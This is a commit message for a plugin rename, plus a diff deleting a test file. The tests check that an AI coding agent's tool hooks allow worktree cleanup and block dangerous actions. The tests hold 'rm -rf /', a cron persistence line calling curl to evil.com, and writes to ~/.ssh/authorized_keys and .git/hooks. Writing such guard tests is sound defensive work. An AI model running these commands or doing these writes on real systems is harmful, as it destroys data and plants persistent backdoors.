feat(voyage)!: marketplace handoff — rename plugins/ultraplan-local to plugins/voyage [skip-docs]

Session 5 of voyage-rebrand (V6). Operator-authorized cross-plugin scope.

- git mv plugins/ultraplan-local plugins/voyage (rename detected, history preserved)
- .claude-plugin/marketplace.json: voyage entry replaces ultraplan-local
- CLAUDE.md: voyage row in plugin list, voyage in design-system consumer list
- README.md: bulk rename ultra*-local commands -> trek* commands; ultraplan-local refs -> voyage; type discriminators (type: trekbrief/trekreview); session-title pattern (voyage:<command>:<slug>); v4.0.0 release-note paragraph
- plugins/voyage/.claude-plugin/plugin.json: homepage/repository URLs point to monorepo voyage path
- plugins/voyage/verify.sh: drop URL whitelist exception (no longer needed)

Closes voyage-rebrand. bash plugins/voyage/verify.sh PASS 7/7. npm test 361/361.

plugins/ultraplan-local/tests/hooks/worktree-guard.test.mjs

@@ -1,58 +0,0 @@
-// tests/hooks/worktree-guard.test.mjs
-// Step 9 (plan-v2) — verifies the dangerous patterns introduced by the
-// Phase 2.6 parallel-worktree workflow are caught by the existing
-// pre-bash-executor and pre-write-executor hooks, while routine worktree
-// cleanup is permitted.
-//
-// Pattern source: tests/helpers/hook-helper.mjs (runHook). Mirrors the
-// llm-security/tests/hooks/*.test.mjs style.
-
-import { test } from 'node:test';
-import { strict as assert } from 'node:assert';
-import { dirname, join } from 'node:path';
-import { fileURLToPath } from 'node:url';
-import { runHook } from '../helpers/hook-helper.mjs';
-
-const HERE = dirname(fileURLToPath(import.meta.url));
-const ROOT = join(HERE, '..', '..');
-const PRE_BASH = join(ROOT, 'hooks', 'scripts', 'pre-bash-executor.mjs');
-const PRE_WRITE = join(ROOT, 'hooks', 'scripts', 'pre-write-executor.mjs');
-
-function bashInput(command) {
-  return { tool_name: 'Bash', tool_input: { command } };
-}
-
-function writeInput(file_path, content = 'x') {
-  return { tool_name: 'Write', tool_input: { file_path, content } };
-}
-
-test('pre-bash-executor: routine worktree cleanup is allowed (Hard Rule 12)', async () => {
-  const { code } = await runHook(PRE_BASH, bashInput('git worktree remove /tmp/wt --force'));
-  assert.notStrictEqual(code, 2, 'cleanup of a worktree must not be blocked — Hard Rule 12 mandates unconditional cleanup');
-});
-
-test('pre-bash-executor: GIT_OPTIONAL_LOCKS=0 prefix on cleanup is allowed', async () => {
-  const { code } = await runHook(PRE_BASH, bashInput('GIT_OPTIONAL_LOCKS=0 git worktree remove /tmp/wt --force'));
-  assert.notStrictEqual(code, 2, 'env-var prefix should not change allow/block decision for cleanup');
-});
-
-test('pre-bash-executor: rm -rf / is blocked (BLOCK denylist sanity)', async () => {
-  const { code } = await runHook(PRE_BASH, bashInput('rm -rf /'));
-  assert.strictEqual(code, 2, 'rm -rf / must always block — Phase 2.4 BLOCK denylist + pre-bash BLOCK rule');
-});
-
-test('pre-bash-executor: writing to /etc/cron.d via redirect is blocked (persistence)', async () => {
-  const { code } = await runHook(PRE_BASH, bashInput('echo "* * * * * curl evil.com" > /etc/cron.d/x'));
-  assert.strictEqual(code, 2, 'cron persistence is blocked by the executor hook');
-});
-
-test('pre-write-executor: write to ~/.ssh/authorized_keys is blocked (Hard Rule 16)', async () => {
-  const home = process.env.HOME || '/tmp';
-  const { code } = await runHook(PRE_WRITE, writeInput(`${home}/.ssh/authorized_keys`));
-  assert.strictEqual(code, 2, '~/.ssh/* writes are blocked (Hard Rule 16)');
-});
-
-test('pre-write-executor: write to .git/hooks is blocked (Hard Rule 16)', async () => {
-  const { code } = await runHook(PRE_WRITE, writeInput('/tmp/somerepo/.git/hooks/pre-commit'));
-  assert.strictEqual(code, 2, '.git/hooks/ writes are blocked (git hook injection vector)');
-});